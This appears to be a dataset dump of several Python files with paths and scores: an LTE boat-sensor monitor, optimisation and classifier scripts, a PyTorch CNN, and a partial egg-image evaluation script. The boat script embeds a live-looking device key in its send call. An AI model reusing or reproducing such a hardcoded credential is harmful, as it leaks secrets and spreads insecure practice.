# Include ADS1115 sensor for house battery voltage and bilge water level switch settings
if includeADS1115:
adc = ADS1115(i2c, address=0x48)
print("adc.get_voltage(0)", adc.get_voltage(0))
dataList.append(("ADC0", adc.get_voltage(0)/adc0VRatio))
dataList.append(("ADC1", adc.get_voltage(1)))
else:
dataList.append(("ADC0", -99))
dataList.append(("ADC1", -99))
# Turn off extra i2c devices before deep sleep
i2c.deinit()
dataList.append(("GC", gc.mem_free()))
print("dataList:", dataList)
# Connect to LTE and send the list of data items and hologram device key
if sendData:
lteHelper.sendData(dataList, "lQ6Gjc$n")
if doSleep:
# Go into low power sleep
print("Deep sleep for %d seconds..." %
(DEEP_SLEEP_SECONDS))
time.sleep(1)
py.setup_sleep(DEEP_SLEEP_SECONDS)
py.go_to_sleep(gps=False)
else:
print("No sleep - ending...")
except Exception as e:
# Any exceptions we reboot
sys.print_exception(e)
print("Waiting 60 seconds to reboot...")
time.sleep(60)
print('Reboot')
machine.reset() | uPython/main.py | import pycom
import lteHelper
import machine
from machine import I2C
import pytrackHelper
from pytrack import Pytrack
from LIS2HH12 import LIS2HH12
import time
import gc
import sys
import bme280
from ADS1115 import ADS1115
# ***********************************************************
# ourBoatMonitor IOT code for the boat sensor and LTE transmiter
# ***********************************************************
pycom.heartbeat(False)
# Flags to switch on sensors to collect
includeGPS = True
includeBME280 = True
includeADS1115 = True
# Flag to send data via LTE
sendData = True
# Seconds to spend in low power sleep
DEEP_SLEEP_SECONDS = 3600
# Voltage divider adjustment for ADC0
# Send the true voltage to the backend
adc0VRatio = 0.0909
# flag to go into sleep loop (Turn off for testing)
doSleep = True
try:
py = Pytrack()
acc = LIS2HH12()
print("")
# Set deep sleep parameters
py.setup_int_wake_up(True, False)
# Turn off accelerometer
acc.set_odr(0)
gc.collect()
# ******************************************************************
# Collect sensor data, append to the dataList array to be sent via LTE
# ******************************************************************
dataList = []
# Get the Lithium Ion (Li-ion) battery voltage
LIVoltage = py.read_battery_voltage()
dataList.append(("LIVoltage", LIVoltage))
print("LIVoltage", LIVoltage)
# Include GPS reading
if includeGPS:
print("Getting GPS...")
# Get GPS data from pytrack board
gps = pytrackHelper.getGPS(py, 300)
if (gps[0] is not None and gps[1] is not None):
# Create a list of key value pairs to be
# sent by LTE to hologram
dataList.append(("lat", gps[0]))
dataList.append(("lng", gps[1]))
else:
dataList.append(("lat", 0))
dataList.append(("lng", 0))
else:
dataList.append(("lat", 0))
dataList.append(("lng", 0))
# Use i2c bus 1 for additional i2c devices (Otherwise using Bus 0 messes up the deep sleep processing)
i2c = I2C(1, I2C.MASTER, pins=('P10', 'P9'), baudrate=100000)
# Include the BME280 sensor for Temperature, Presure and humidity readings
if includeBME280:
print("BME280")
bme = bme280.BME280(i2c=i2c)
t, p, h = bme.values
dataList.append(("Pressure", p))
dataList.append(("Temperature", t))
dataList.append(("Humidity", h))
else:
dataList.append(("Pressure", 0))
dataList.append(("Temperature", 0))
dataList.append(("Humidity", 0))
# Include ADS1115 sensor for house battery voltage and bilge water level switch settings
if includeADS1115:
adc = ADS1115(i2c, address=0x48)
print("adc.get_voltage(0)", adc.get_voltage(0))
dataList.append(("ADC0", adc.get_voltage(0)/adc0VRatio))
dataList.append(("ADC1", adc.get_voltage(1)))
else:
dataList.append(("ADC0", -99))
dataList.append(("ADC1", -99))
# Turn off extra i2c devices before deep sleep
i2c.deinit()
dataList.append(("GC", gc.mem_free()))
print("dataList:", dataList)
# Connect to LTE and send the list of data items and hologram device key
if sendData:
lteHelper.sendData(dataList, "lQ6Gjc$n")
if doSleep:
# Go into low power sleep
print("Deep sleep for %d seconds..." %
(DEEP_SLEEP_SECONDS))
time.sleep(1)
py.setup_sleep(DEEP_SLEEP_SECONDS)
py.go_to_sleep(gps=False)
else:
print("No sleep - ending...")
except Exception as e:
# Any exceptions we reboot
sys.print_exception(e)
print("Waiting 60 seconds to reboot...")
time.sleep(60)
print('Reboot')
machine.reset() | 0.18363 | 0.294177 |
import numpy as np
import scipy
from algorithms.accelerated_gradient_descent import \
accelerated_gradient_descent
from algorithms.accelerated_gradient_descent_adaptive_restart import \
accelerated_gradient_descent_adaptive_restart
from algorithms.accelerated_gradient_descent_adaptive_restart_line_search import \
accelerated_gradient_descent_adaptive_restart_line_search
from algorithms.accelerated_gradient_descent_line_search import \
accelerated_gradient_descent_line_search
from algorithms.conjugate_gradient import conjugate_gradient
from algorithms.gradient_descent import gradient_descent
from algorithms.gradient_descent_line_search import \
gradient_descent_line_search
from utils.plot_results import plot_results
# Parameters for synthetic data.
cfg = {}
cfg["n"] = int(1e3)
# number of features
cfg["p"] = int(1e3)
# number of dimensions
cfg["noisestd"] = 1e-6
# standard deviation of additive iid gaussian noise (0 for noiseless)
cfg["strcnvx"] = False
# false = not strongly convex
# true = strongly convex with, lambda = 0.01*norm(A'*A)
# Methods to be checked.
chk = {
"GD": True,
"AGD": True,
"AGDR": True,
"LSGD": True,
"LSAGD": True,
"LSAGDR": True,
"CG": True,
}
# Generate synthetic data.
A = np.random.random((cfg["n"], cfg["p"]))
# Generate s-sparse vector.
xtrue = np.random.randn(cfg["p"])
# Take (noisy) samples.
noise = cfg["noisestd"] * np.random.randn(cfg["n"])
b = np.dot(A, xtrue) + noise
# Strongly convex OR Convex?
if cfg["strcnvx"]:
cfg["lambda"] = 0.01 * np.linalg.norm(A)
else:
cfg["lambda"] = 0.0
# Evaluate the Lipschitz constant and strong convexity parameter.
parameter = {}
parameter["Lips"] = np.linalg.norm(np.dot(A.T, A) + cfg["lambda"] * np.eye(cfg["p"]))
parameter["strcnvx"] = cfg["lambda"]
# Set parameters and solve numerically.
print("Numerical solution process is started: \n")
fx = lambda x: (
0.5 * np.linalg.norm((np.dot(A, x) - b)) ** 2
+ 0.5 * cfg["lambda"] * np.linalg.norm(x) ** 2
)
gradf = lambda x: (np.dot(A.T, np.dot(A, x) - b) + cfg["lambda"] * x)
phi = lambda x: (np.dot(A.T, np.dot(A, x)) + cfg["lambda"] * x)
y = np.dot(A.T, b)
parameter["x0"] = np.zeros((cfg["p"]))
parameter["tolx"] = 1e-5 # You can vary tolx and maxit
parameter["maxit"] = 4e2 # to achieve the convergence.
x = {}
info = {}
if chk["GD"]:
x["GD"], info["GD"] = gradient_descent(fx, gradf, parameter, verbose=1)
if chk["AGD"]:
x["AGD"], info["AGD"] = accelerated_gradient_descent(
fx, gradf, parameter, verbose=1
)
if chk["AGDR"]:
x["AGDR"], info["AGDR"] = accelerated_gradient_descent_adaptive_restart(
fx, gradf, parameter, verbose=1
)
if chk["LSGD"]:
parameter["kappa"] = 1.0
x["LSGD"], info["LSGD"] = gradient_descent_line_search(
fx, gradf, parameter, verbose=1
)
if chk["LSAGD"]:
x["LSAGD"], info["LSAGD"] = accelerated_gradient_descent_line_search(
fx, gradf, parameter, verbose=1
)
if chk["LSAGDR"]:
x["LSAGDR"], info[
"LSAGDR"
] = accelerated_gradient_descent_adaptive_restart_line_search(
fx, gradf, parameter, verbose=1
)
if chk["CG"]:
x["CG"], info["CG"] = conjugate_gradient(fx, phi, y, parameter, verbose=1)
print("Numerical solution process is completed. \n")
# Find x^* and f^* if noisy to plot data.
fmin = 0.0
if cfg["noisestd"] != 0 and cfg["n"] >= cfg["p"]:
xmin = np.dot(
np.linalg.pinv(np.dot(A.T, A) + cfg["lambda"] * np.eye(cfg["p"])),
np.dot(A.T, b),
)
fmin = fx(xmin)
# Plot the results.
options = {"dir": "../figs", "name": "ridge-regression"}
plot_results(x, info, options, fmin=0) | src/ridge_regression.py | import numpy as np
import scipy
from algorithms.accelerated_gradient_descent import \
accelerated_gradient_descent
from algorithms.accelerated_gradient_descent_adaptive_restart import \
accelerated_gradient_descent_adaptive_restart
from algorithms.accelerated_gradient_descent_adaptive_restart_line_search import \
accelerated_gradient_descent_adaptive_restart_line_search
from algorithms.accelerated_gradient_descent_line_search import \
accelerated_gradient_descent_line_search
from algorithms.conjugate_gradient import conjugate_gradient
from algorithms.gradient_descent import gradient_descent
from algorithms.gradient_descent_line_search import \
gradient_descent_line_search
from utils.plot_results import plot_results
# Parameters for synthetic data.
cfg = {}
cfg["n"] = int(1e3)
# number of features
cfg["p"] = int(1e3)
# number of dimensions
cfg["noisestd"] = 1e-6
# standard deviation of additive iid gaussian noise (0 for noiseless)
cfg["strcnvx"] = False
# false = not strongly convex
# true = strongly convex with, lambda = 0.01*norm(A'*A)
# Methods to be checked.
chk = {
"GD": True,
"AGD": True,
"AGDR": True,
"LSGD": True,
"LSAGD": True,
"LSAGDR": True,
"CG": True,
}
# Generate synthetic data.
A = np.random.random((cfg["n"], cfg["p"]))
# Generate s-sparse vector.
xtrue = np.random.randn(cfg["p"])
# Take (noisy) samples.
noise = cfg["noisestd"] * np.random.randn(cfg["n"])
b = np.dot(A, xtrue) + noise
# Strongly convex OR Convex?
if cfg["strcnvx"]:
cfg["lambda"] = 0.01 * np.linalg.norm(A)
else:
cfg["lambda"] = 0.0
# Evaluate the Lipschitz constant and strong convexity parameter.
parameter = {}
parameter["Lips"] = np.linalg.norm(np.dot(A.T, A) + cfg["lambda"] * np.eye(cfg["p"]))
parameter["strcnvx"] = cfg["lambda"]
# Set parameters and solve numerically.
print("Numerical solution process is started: \n")
fx = lambda x: (
0.5 * np.linalg.norm((np.dot(A, x) - b)) ** 2
+ 0.5 * cfg["lambda"] * np.linalg.norm(x) ** 2
)
gradf = lambda x: (np.dot(A.T, np.dot(A, x) - b) + cfg["lambda"] * x)
phi = lambda x: (np.dot(A.T, np.dot(A, x)) + cfg["lambda"] * x)
y = np.dot(A.T, b)
parameter["x0"] = np.zeros((cfg["p"]))
parameter["tolx"] = 1e-5 # You can vary tolx and maxit
parameter["maxit"] = 4e2 # to achieve the convergence.
x = {}
info = {}
if chk["GD"]:
x["GD"], info["GD"] = gradient_descent(fx, gradf, parameter, verbose=1)
if chk["AGD"]:
x["AGD"], info["AGD"] = accelerated_gradient_descent(
fx, gradf, parameter, verbose=1
)
if chk["AGDR"]:
x["AGDR"], info["AGDR"] = accelerated_gradient_descent_adaptive_restart(
fx, gradf, parameter, verbose=1
)
if chk["LSGD"]:
parameter["kappa"] = 1.0
x["LSGD"], info["LSGD"] = gradient_descent_line_search(
fx, gradf, parameter, verbose=1
)
if chk["LSAGD"]:
x["LSAGD"], info["LSAGD"] = accelerated_gradient_descent_line_search(
fx, gradf, parameter, verbose=1
)
if chk["LSAGDR"]:
x["LSAGDR"], info[
"LSAGDR"
] = accelerated_gradient_descent_adaptive_restart_line_search(
fx, gradf, parameter, verbose=1
)
if chk["CG"]:
x["CG"], info["CG"] = conjugate_gradient(fx, phi, y, parameter, verbose=1)
print("Numerical solution process is completed. \n")
# Find x^* and f^* if noisy to plot data.
fmin = 0.0
if cfg["noisestd"] != 0 and cfg["n"] >= cfg["p"]:
xmin = np.dot(
np.linalg.pinv(np.dot(A.T, A) + cfg["lambda"] * np.eye(cfg["p"])),
np.dot(A.T, b),
)
fmin = fx(xmin)
# Plot the results.
options = {"dir": "../figs", "name": "ridge-regression"}
plot_results(x, info, options, fmin=0) | 0.623377 | 0.339034 |
from django.core.wsgi import get_wsgi_application
from sklearn.metrics import *
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
import os, sys
proj_path = "."
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "backend.settings")
sys.path.append(proj_path)
os.chdir(proj_path)
application = get_wsgi_application()
from backend.apps.checker.util import *
from backend.apps.checker.models import *
print("Setting up..")
cDict = loadCanonDict()
qs_Examples = ArticleExample.objects.filter(quality_class__lt=5)
print("Processing examples")
(Y_vector, examplesMatrix) = processExamples(qs_Examples, cDict)
print("ExamplesMatrix Results: ")
print(examplesMatrix.shape)
print("Y values results:")
print(Y_vector.shape)
print("Max/min of Y: ")
ymax = max(Y_vector)
ymin = min(Y_vector)
print(str(ymax) + "/" + str(ymin))
X_train, X_test, y_train, y_test = train_test_split(
examplesMatrix, Y_vector, test_size=0.2)
print("Training...")
# Uncomment the model that you wish to try out:
# model = MLPClassifier(hidden_layer_sizes=(128,64,32,16,8), max_iter=2500)
model = SVC(gamma='scale', probability = True)
# model = KNeighborsClassifier()
# model = LinearDiscriminantAnalysis()
# model = GaussianNB()
# model = DecisionTreeClassifier()
# model = LogisticRegression()
model.fit(X_train, y_train)
predictions = model.predict(X_test)
print("Max/min of predictions: ")
ymax = max(predictions)
ymin = min(predictions)
print(str(ymax) + "/" + str(ymin))
print("Max/Min of Y_test")
ymax = max(y_test)
ymin = min(y_test)
print(str(ymax) + "/" + str(ymin))
print("Max/Min of Y_train")
ymax = max(y_train)
ymin = min(y_train)
print(str(ymax) + "/" + str(ymin))
print("Statistical tests...")
print("***************")
print("Accuracy score: " + str(accuracy_score(predictions, y_test)))
print("Confusion Matrix: ")
print(confusion_matrix(predictions, y_test))
print("Classification report: ")
print(classification_report(predictions, y_test))
print("***************")
print("Regression based: ")
rSq = r2_score(y_test, predictions)
expVariance = explained_variance_score(y_test, predictions)
maxErr = max_error(y_test, predictions)
mae = mean_absolute_error(y_test, predictions)
print("R^2: " + str(rSq))
print("Explained variance: " + str(expVariance))
print("Max Error: " + str(maxErr))
print("Mean absolute Error: " + str(mae))
exit(0) | backend/apps/checker/class_learner.py | from django.core.wsgi import get_wsgi_application
from sklearn.metrics import *
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
import os, sys
proj_path = "."
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "backend.settings")
sys.path.append(proj_path)
os.chdir(proj_path)
application = get_wsgi_application()
from backend.apps.checker.util import *
from backend.apps.checker.models import *
print("Setting up..")
cDict = loadCanonDict()
qs_Examples = ArticleExample.objects.filter(quality_class__lt=5)
print("Processing examples")
(Y_vector, examplesMatrix) = processExamples(qs_Examples, cDict)
print("ExamplesMatrix Results: ")
print(examplesMatrix.shape)
print("Y values results:")
print(Y_vector.shape)
print("Max/min of Y: ")
ymax = max(Y_vector)
ymin = min(Y_vector)
print(str(ymax) + "/" + str(ymin))
X_train, X_test, y_train, y_test = train_test_split(
examplesMatrix, Y_vector, test_size=0.2)
print("Training...")
# Uncomment the model that you wish to try out:
# model = MLPClassifier(hidden_layer_sizes=(128,64,32,16,8), max_iter=2500)
model = SVC(gamma='scale', probability = True)
# model = KNeighborsClassifier()
# model = LinearDiscriminantAnalysis()
# model = GaussianNB()
# model = DecisionTreeClassifier()
# model = LogisticRegression()
model.fit(X_train, y_train)
predictions = model.predict(X_test)
print("Max/min of predictions: ")
ymax = max(predictions)
ymin = min(predictions)
print(str(ymax) + "/" + str(ymin))
print("Max/Min of Y_test")
ymax = max(y_test)
ymin = min(y_test)
print(str(ymax) + "/" + str(ymin))
print("Max/Min of Y_train")
ymax = max(y_train)
ymin = min(y_train)
print(str(ymax) + "/" + str(ymin))
print("Statistical tests...")
print("***************")
print("Accuracy score: " + str(accuracy_score(predictions, y_test)))
print("Confusion Matrix: ")
print(confusion_matrix(predictions, y_test))
print("Classification report: ")
print(classification_report(predictions, y_test))
print("***************")
print("Regression based: ")
rSq = r2_score(y_test, predictions)
expVariance = explained_variance_score(y_test, predictions)
maxErr = max_error(y_test, predictions)
mae = mean_absolute_error(y_test, predictions)
print("R^2: " + str(rSq))
print("Explained variance: " + str(expVariance))
print("Max Error: " + str(maxErr))
print("Mean absolute Error: " + str(mae))
exit(0) | 0.408631 | 0.294843 |
import torch
import torch.nn as nn
import torch.nn.functional as F
BN_EPS = 1e-05
BN_MOMENTUM = 0.9 # too large?
class DONetMultiscaleClassificationOrientationPose(nn.Module):
def __init__(self):
super(DONetMultiscaleClassificationOrientationPose,
self).__init__()
self.activation = F.relu
self.input_depth_1_conv = nn.Conv2d(1, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_1_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.input_depth_2_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_2_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.input_depth_3_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_3_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_1_shortcut_pool = nn.AvgPool2d(kernel_size=(18, 8),
stride=(18, 8))
self.main_1_shortcut_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=0,
bias=False, padding_mode='zeros')
self.main_1_shortcut_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_1_pool = nn.MaxPool2d(kernel_size=(3, 2), stride=(3, 2))
self.main_2_conv = nn.Conv2d(24, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_2_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_3_conv = nn.Conv2d(48, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_3_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_4_conv = nn.Conv2d(48, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_4_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_5_shortcut_pool = nn.AvgPool2d(kernel_size=(6, 4),
stride=(6, 4))
self.main_5_shortcut_conv = nn.Conv2d(48, 48, kernel_size=(3, 3),
stride=(1, 1), padding=0,
bias=False, padding_mode='zeros')
self.main_5_shortcut_bn = nn.BatchNorm2d(48, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_5_pool = nn.MaxPool2d(kernel_size=(3, 2), stride=(3, 2))
self.main_6_conv = nn.Conv2d(48, 64, kernel_size=(3, 3), stride=(1, 1),
padding=0,
bias=False, padding_mode='zeros')
self.main_6_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_7_conv = nn.Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1),
padding=0,
bias=False, padding_mode='zeros')
self.main_7_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_8_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))
self.main_9_conv = nn.Conv2d(64+48+24, 64,
kernel_size=(1, 1), stride=(1, 1),
padding=0, bias=False,
padding_mode='zeros')
self.main_9_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.output_2_dropout = nn.Dropout(p=0.2)
self.output_2_dense = nn.Linear(1280, 512, bias=True)
self.output_3_dropout = nn.Dropout(p=0.5)
self.output_3_dense = nn.Linear(512, 7, bias=True)
def forward(self, x):
x = self.activation(self.input_depth_1_bn(self.input_depth_1_conv(x)))
x = self.activation(self.input_depth_2_bn(self.input_depth_2_conv(x)))
x = self.activation(self.input_depth_3_bn(self.input_depth_3_conv(x)))
# shortcut 1
shortcut_1 = self.main_1_shortcut_pool(x)
shortcut_1 = self.main_1_shortcut_conv(shortcut_1)
shortcut_1 = self.main_1_shortcut_bn(shortcut_1)
shortcut_1 = self.activation(shortcut_1)
x = self.main_1_pool(x)
x = self.activation(self.main_2_bn(self.main_2_conv(x)))
x = self.activation(self.main_3_bn(self.main_3_conv(x)))
x = self.activation(self.main_4_bn(self.main_4_conv(x)))
# shortcut 2
shortcut_2 = self.main_5_shortcut_pool(x)
shortcut_2 = self.main_5_shortcut_conv(shortcut_2)
shortcut_2 = self.main_5_shortcut_bn(shortcut_2)
shortcut_2 = self.activation(shortcut_2)
x = self.main_5_pool(x)
x = self.activation(self.main_6_bn(self.main_6_conv(x)))
x = self.activation(self.main_7_bn(self.main_7_conv(x)))
x = self.main_8_pool(x)
# concatenate shortcuts and x to fuse results
x = torch.cat([shortcut_1, shortcut_2, x], dim=1)
x = self.main_9_conv(x)
x = self.main_9_bn(x)
x = x.view(-1, 1280)
x = self.output_2_dropout(x)
x = self.output_2_dense(x)
x = self.activation(x)
x = self.output_3_dropout(x)
x = self.output_3_dense(x)
return x
def _test():
import numpy as np
from torchsummary import summary
input_shape = (1, 126, 48)
x = np.random.random((1,)+input_shape).astype('float32')
model = DONetMultiscaleClassificationOrientationPose()
# print summary
print("DONetMultiscale")
summary(model, device='cpu', input_size=input_shape)
# test model
y = model(torch.tensor(x))
assert y.detach().numpy().shape == (1, 7)
dummy_loss = torch.sum(y)
dummy_loss.backward() | src/models/donet_ms.py | import torch
import torch.nn as nn
import torch.nn.functional as F
BN_EPS = 1e-05
BN_MOMENTUM = 0.9 # too large?
class DONetMultiscaleClassificationOrientationPose(nn.Module):
def __init__(self):
super(DONetMultiscaleClassificationOrientationPose,
self).__init__()
self.activation = F.relu
self.input_depth_1_conv = nn.Conv2d(1, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_1_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.input_depth_2_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_2_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.input_depth_3_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_3_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_1_shortcut_pool = nn.AvgPool2d(kernel_size=(18, 8),
stride=(18, 8))
self.main_1_shortcut_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=0,
bias=False, padding_mode='zeros')
self.main_1_shortcut_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_1_pool = nn.MaxPool2d(kernel_size=(3, 2), stride=(3, 2))
self.main_2_conv = nn.Conv2d(24, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_2_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_3_conv = nn.Conv2d(48, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_3_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_4_conv = nn.Conv2d(48, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_4_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_5_shortcut_pool = nn.AvgPool2d(kernel_size=(6, 4),
stride=(6, 4))
self.main_5_shortcut_conv = nn.Conv2d(48, 48, kernel_size=(3, 3),
stride=(1, 1), padding=0,
bias=False, padding_mode='zeros')
self.main_5_shortcut_bn = nn.BatchNorm2d(48, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_5_pool = nn.MaxPool2d(kernel_size=(3, 2), stride=(3, 2))
self.main_6_conv = nn.Conv2d(48, 64, kernel_size=(3, 3), stride=(1, 1),
padding=0,
bias=False, padding_mode='zeros')
self.main_6_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_7_conv = nn.Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1),
padding=0,
bias=False, padding_mode='zeros')
self.main_7_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_8_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))
self.main_9_conv = nn.Conv2d(64+48+24, 64,
kernel_size=(1, 1), stride=(1, 1),
padding=0, bias=False,
padding_mode='zeros')
self.main_9_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.output_2_dropout = nn.Dropout(p=0.2)
self.output_2_dense = nn.Linear(1280, 512, bias=True)
self.output_3_dropout = nn.Dropout(p=0.5)
self.output_3_dense = nn.Linear(512, 7, bias=True)
def forward(self, x):
x = self.activation(self.input_depth_1_bn(self.input_depth_1_conv(x)))
x = self.activation(self.input_depth_2_bn(self.input_depth_2_conv(x)))
x = self.activation(self.input_depth_3_bn(self.input_depth_3_conv(x)))
# shortcut 1
shortcut_1 = self.main_1_shortcut_pool(x)
shortcut_1 = self.main_1_shortcut_conv(shortcut_1)
shortcut_1 = self.main_1_shortcut_bn(shortcut_1)
shortcut_1 = self.activation(shortcut_1)
x = self.main_1_pool(x)
x = self.activation(self.main_2_bn(self.main_2_conv(x)))
x = self.activation(self.main_3_bn(self.main_3_conv(x)))
x = self.activation(self.main_4_bn(self.main_4_conv(x)))
# shortcut 2
shortcut_2 = self.main_5_shortcut_pool(x)
shortcut_2 = self.main_5_shortcut_conv(shortcut_2)
shortcut_2 = self.main_5_shortcut_bn(shortcut_2)
shortcut_2 = self.activation(shortcut_2)
x = self.main_5_pool(x)
x = self.activation(self.main_6_bn(self.main_6_conv(x)))
x = self.activation(self.main_7_bn(self.main_7_conv(x)))
x = self.main_8_pool(x)
# concatenate shortcuts and x to fuse results
x = torch.cat([shortcut_1, shortcut_2, x], dim=1)
x = self.main_9_conv(x)
x = self.main_9_bn(x)
x = x.view(-1, 1280)
x = self.output_2_dropout(x)
x = self.output_2_dense(x)
x = self.activation(x)
x = self.output_3_dropout(x)
x = self.output_3_dense(x)
return x
def _test():
import numpy as np
from torchsummary import summary
input_shape = (1, 126, 48)
x = np.random.random((1,)+input_shape).astype('float32')
model = DONetMultiscaleClassificationOrientationPose()
# print summary
print("DONetMultiscale")
summary(model, device='cpu', input_size=input_shape)
# test model
y = model(torch.tensor(x))
assert y.detach().numpy().shape == (1, 7)
dummy_loss = torch.sum(y)
dummy_loss.backward() | 0.890812 | 0.329891 |
from tkinter.tix import Tree
import requests
import os
import time
import cv2
import numpy as np
from scipy.special import softmax
from sklearn import metrics
import pandas as pd
def parse_labels(filenames):
return [filename[:-4].split('_')[-4][1:-1] for filename in filenames]
def parse_label(filename):
return filename[:-4].split('_')[-4][1:-1]
def render_label(image, label, pred):
image = cv2.putText(image, f'Label: {label}', (50, 100),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2, cv2.LINE_AA)
image = cv2.putText(image, f'Pred: {pred}', (50, 50),
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2, cv2.LINE_AA)
cv2.imshow('Classification Result',image)
cv2.waitKey(1)
return image
def save_csv_report(report, output_dir, class_names):
repdf = pd.DataFrame(report).transpose()
repdf.insert(loc=0, column='class', value=class_names + ["accuracy", "macro avg", "weighted avg"])
repdf.to_csv(output_dir, index=False,float_format='%.4f')
def save_csv_confusion_matrix(confusion_matrix, output_dir, class_names):
cm = pd.DataFrame(confusion_matrix, columns=class_names)
cm.insert(loc=0, column=' ', value=class_names)
cm.to_csv(output_dir, index=False)
# API url
api = 'http://10.8.0.94:5000/api/photos/'
class_label_to_name = {0: 'ok', 1: 'qishihuangdong', 2 : 'sipei', 3: 'kongliao', 4: 'wuqishi', 5: 'liewen', 6: 'ruopei'}
name_to_class_label = {'ok': 0 , 'qishihuangdong' : 1, 'sipei' : 1, 'kongliao' : 1, 'wuqishi' : 1, 'liewen' : 1, 'ruopei' : 1}
# name_to_class_label = {'ok': 0 , 'qishihuangdong' : 1, 'sipei' : 2, 'kongliao' : 3, 'wuqishi' : 4, 'liewen' : 5, 'ruopei' : 6}
test_file_path= '/Users/luvletteru/Documents/2022-02-13-Eggs-Test'
output_dir = '/Users/luvletteru/Documents/2022-02-16-Eggs-Test-Result'
result_dir = os.path.join(output_dir, 'results')
no_ok_dir = os.path.join(output_dir, 'no_ok')
bn_class_names = ['OK', 'NoOK']
# bn_class_names = ['好蛋', '气室抖动', '死胚', '空', '无气室', '裂纹', '弱胚']
os.makedirs(result_dir, exist_ok=True)
os.makedirs(no_ok_dir, exist_ok=True)
filenames = os.listdir(test_file_path)
num_samples = len(filenames)
# Parse labels from filenames
# label_names = parse_labels(filenames)
# labels = [name_to_class_label[label_name] for label_name in label_names if label_name in name_to_class_label]
label_names = []
labels = []
pred_label_names = []
pred_labels = []
start = time.time()
for idx, filename in enumerate(filenames):
if '--' in filename:
print(f"Filter {filename}")
continue
s = time.time()
image_path = os.path.join(test_file_path, filename)
image = cv2.imread(image_path)
